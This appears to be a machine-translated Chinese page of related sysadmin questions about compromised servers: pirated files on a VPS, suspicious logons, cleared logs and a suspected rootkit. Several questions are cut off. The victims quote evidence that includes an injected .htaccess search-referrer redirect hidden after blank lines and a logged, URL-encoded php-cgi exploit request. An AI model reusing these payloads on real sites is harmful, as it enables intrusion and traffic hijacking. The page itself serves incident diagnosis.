相关疑难解决方法(0)

我工作的公司在 VPS 上经营一系列电子商务商店。这是一个 WAMP 堆栈，50GB 存储空间。

我们使用一种几乎完全在客户端运行的古老电子商务软件。当订单被接受时，它会将其写入磁盘，然后我们安排一个任务，每 10 分钟下载一次订单。

前几天，我们的磁盘空间用完了，导致订单写入失败。我很快就从邮件服务器中删除了一些旧日志，并很快释放了几个 GB，但我想知道我们如何才能填满 50GB 的日志。

事实证明，我们没有。隐藏在c:\System Volume Information目录深处，我们有一堆盗版视频，这些视频似乎是在过去三周内出现的（查看时间戳）。色情、美国体育、澳大利亚烹饪节目。一个非常奇怪的集合。看起来不像个人的个人品味 - 更像是 VPS 被用作骡子。

我们有 5 次尝试，您在我们的 FTP 服务器上被阻止策略（另外，没有可以访问该目录的 FTP 帐户），并且 Windows 用户帐户最近更改了密码。主要途径是封闭的 - 日志可以验证这一点。我想我会看看它是否再次发生，是的，今天早上又出现了另一个烹饪节目。

我是我公司中唯一知道这个问题的人，并且只有两个人中的一个可以访问 VPS（另一个是我的老板，但不 - 不是他）。

那么这是怎么发生的呢？

VPS 上的某些软件是否存在漏洞？VPS 所有者是否在我们租用的空间内兜售商品？（他们能做到吗？）

我不想删除该软件，以防它被视为针对这种外部力量的敌对行动，而他们选择进行报复。

我该怎么办？我该如何解决这个问题？以前有其他人发生过这种情况吗？

在 Fedora 上，root 将无效。什么是解决方案？

大约 4 或 5 天前，一个客户回复我说他们的网站被从谷歌、雅虎等重定向到其他一些可疑的网站，但是当用户在浏览器地址中输入网站 URL 时它工作正常直接酒吧。

我尝试联系我的托管服务提供商，但他们一开始几乎没有帮助，然后似乎需要很长时间才能找出问题所在。

等待让我感到沮丧，我开始寻找发生了什么。在谷歌上搜索了一些解决方案后，我发现我的 .htaccess 文件被黑了。

什么是：

<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>

已经变成

<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
//several hundred empty lines later
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] …

可能重复：
我的服务器被黑了 紧急情况

我正在尝试确定此 linex 网络服务器/openfire 服务器是否已被某种形式的恶意软件或黑客入侵。你能帮我确定这个服务器是否被黑了吗？

下面的日志片段来自运行 apache 的 linux 服务器。前几天安装在服务器上的moodle站点开始渲染apache默认页面。访问日志还显示了一些我不确定的活动。请参阅下面的日志。

85.190.0.3 - - [02/Apr/2012:13:31:01 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 303 "-" "-"
85.190.0.3 - - [02/Apr/2012:13:31:01 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 303 "-" "-"
99.41.69.92 - - [02/Apr/2012:13:33:35 -0600] "GET /files/externallibs.php HTTP/1.1" 404 306 "-" "curl/7.18.0 (x86_64-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1"
212.34.151.92 - - [02/Apr/2012:14:01:46 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
212.34.151.92 - - [02/Apr/2012:14:01:46 …

我有运行良好的 linux (debian) 机器。但是我有问题我需要找出当我使用“mail”命令时是什么程序在发送电子邮件。或者就此而言，当 PHP 脚本使用 mail() 函数发送电子邮件时，我需要知道什么程序正在发送这些电子邮件。

我怎样才能知道？

Ps：为了清楚，我想知道当我（或一个程序）使用“mail”命令时调用了什么程序。

我的服务器上安装了 2-3 个 MTA，但我无法找出哪个负责发送邮件。

可能的重复：
如何处理受感染的服务器？

我们的一台台式机（Win 7 64 位）最近抱怨速度变慢，尤其是在访问 SBS2003 服务器（也是 DC）上的资源时。我调查的一件事是服务器上的 AV，它占用了大约 500MB 的 RAM（它只有 4GB），所以我已经解决了这个问题。仍然存在问题，除此之外，我在服务器上进行了数据包捕获。

桌面（下图中的 23）不断向服务器发出大量 SMB 请求，即使用户有意识地没有访问任何资源。此外，它无缘无故地随机尝试使用另一个用户的凭据登录到服务器。凭据甚至不会出现在机器上的凭据管理器中。

为什么会这样？我在谷歌上搜索了一下，但找不到太多关于该主题的内容 - 令人担忧的是，在搜索“nt create andx request”时我唯一能找到的东西之一是一份名为“Microsoft LSASS Buffer Overflow fromexploit to worm”的白皮书。希望这一切都不是问题，我该怎么做才能进一步查明真相？如果在客户端上使用 netstat 和 taskmgr 有任何帮助，我已经确定负责此的进程被称为“NT 内核和系统”之类的东西。

Win 7 机器还是很慢，其他桌面没有受到影响。我们没有可以追溯到很远的系统还原，所以可能只是擦除它并重新开始。我有一个客户端查询服务器的数据包捕获的图像，以及其他人的凭据，这又一次又一次地循环。我在图 2 中删除的项目是：来自客户端（红色）：计算机名和用户名（其他人的）；从服务器（蓝色）：域名（完整）、服务器名称、域名（缩短）、服务器、用户名。

编辑：使用 ESET NOD32 Ver 5 在 Win 7 桌面上进行病毒扫描，发现 Java/Exploit.CVE[DATE].BR 木马。它已清理/删除文件，这有多令人担忧？我们应该重建机器以确保安全吗？

在用户的笔记本电脑（Windows 7 x64）上，糟糕的性能让我在排除几乎所有其他功能后怀疑是 rootkit。我使用 Autoruns 检查了引导条目，并使用 Malwarebytes 进行了全面扫描，两者都或多或少是干净的。我下载了 RKR，解压缩，以管理员身份运行，但它打不开。我打开任务管理器检查并尝试重新打开程序。有时甚至不会显示该过程。有时它会在列出固定数量的内存的情况下显示约 10 秒，然后死亡。有一次，我得到了 Sysinternals 许可协议，但在那之后它就消失了。尝试重命名 EXE，没有骰子。试过安全模式，没有骰子。

我还没有做的一件事是检查事件日志，我可能应该这样做。除此之外，还有什么机制可能会导致 RKR 无法启动？或者我的系统是否可能受到损害，需要从轨道上发射核武器？

我们在用户通过 OWA 连接时遇到了一些问题。该用户曾经是服务器管理员。

经过今天的检查，直到 9 月 30 日（诊断出问题的那一天），所有 IIS 日志都已被删除。我们确实有备份，当然服务器和帐户上的所有密码都已更改，我检查了系统日志 - 似乎没有与该特定用户地址匹配的 IP。

“安全”日志似乎已被清除，但没有日志已被清除的日志事件。还有一些其他事件日志（例如 RDP）没有显示 IP，可以追溯到 8 月份。看起来这些日志实际上达到了 20MB 的最大大小，然后进行了某种形式的 logrotate。

当然，为了尽可能成为一名优秀的系统管理员，我完全是一个控制狂。谁能向我解释一下 Windows 是否有可能每 3 个月自动清除一次日志？或者这可以基于网络完成吗？（我们只有用于 Exchange 2013 的 OWA/ECP）。

我还注意到物理服务器在磁盘上运行不足......这可能是一个原因吗？

我有一个共享服务器（由 bitnami 提供支持的 amazon ec2 micro）和一个 Web 应用程序（Wordpress），它最近表现出低性能（流量和使用相对稳定）。我看到的 apache2/logs/access.log 中唯一可疑的行是形式

$ tail --lines=1000 /opt/bitnami/apache2/logs/access_log
93.120.84.31 - - [06/Nov/2013:03:02:54 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 504 249

并在ps aux输出中

daemon   29369  0.0  0.2  17688  1500 ?        S    10:52   0:00 /bin/bash ./su 57.54
daemon   29377 30.5  0.0   1780   544 ?        R    10:52   3:14 ./ps 57.54 22

这些进程是什么，如果这是一个 [已知] 漏洞利用/漏洞，我该如何关闭它？我在谷歌上搜索了这个提及，但无法确定这是否适用于我的情况。

如果这个问题属于其他SE站点，请在适当的地方帮我提问。

提前谢谢了！

更新

遵循@Ladadadada 的提示，结果如下。没错，就是入侵。服务器停止，从每周备份重新启动（所有数据库和其他东西都在单独的驱动器上，我希望没有受到损害）并受到监控。 对正在发生的事情以及如何在未来防止这种情况的所有建议表示赞赏。

对于过程ps：

$ sudo ls -l /proc/30633/fd
total 0
lr-x------ 1 daemon daemon 64 …

我正在为我工​​作的小公司重新配置和保护服务器。我们使用它与 Autodesk Vault 一起存储设计文件和其他数据。它在附近服务器提供商的 VPS 上运行。

我这样做的原因是我们的服务器提供商已经通知我们，他们收到关于我们的服务器在互联网上行为不当的投诉，表明它在某种程度上受到了损害。除此之外，我们没有发现任何问题。服务器最初是在我来公司之前设置的，我找不到有关其配置的任何文档。它还运行 Windows Server 2012，所以我决定重新开始使用运行 Windows Server 2019 的新 VPS。这是我第一次使用 Windows 作为服务器操作系统，但我有一些管理 Ubuntu 服务器的经验。

查看旧服务器上的事件查看器，有无数次“4625 审核失败”登录尝试到服务器，但也有不少成功登录不是来自我或我们的组织。4624 审计成功示例：

An account was successfully logged on.

Subject:
    Security ID:        NULL SID
    Account Name:       -
    Account Domain:     -
    Logon ID:       0x0

Logon Type:         3

Impersonation Level:        Impersonation

New Logon:
    Security ID:        ANONYMOUS LOGON
    Account Name:       ANONYMOUS LOGON
    Account Domain:     NT AUTHORITY
    Logon ID:       0x9ABEAB7
    Logon GUID:     {00000000-0000-0000-0000-000000000000}

Process Information:
    Process ID:     0x0
    Process Name:       -

Network Information:
    Workstation Name: …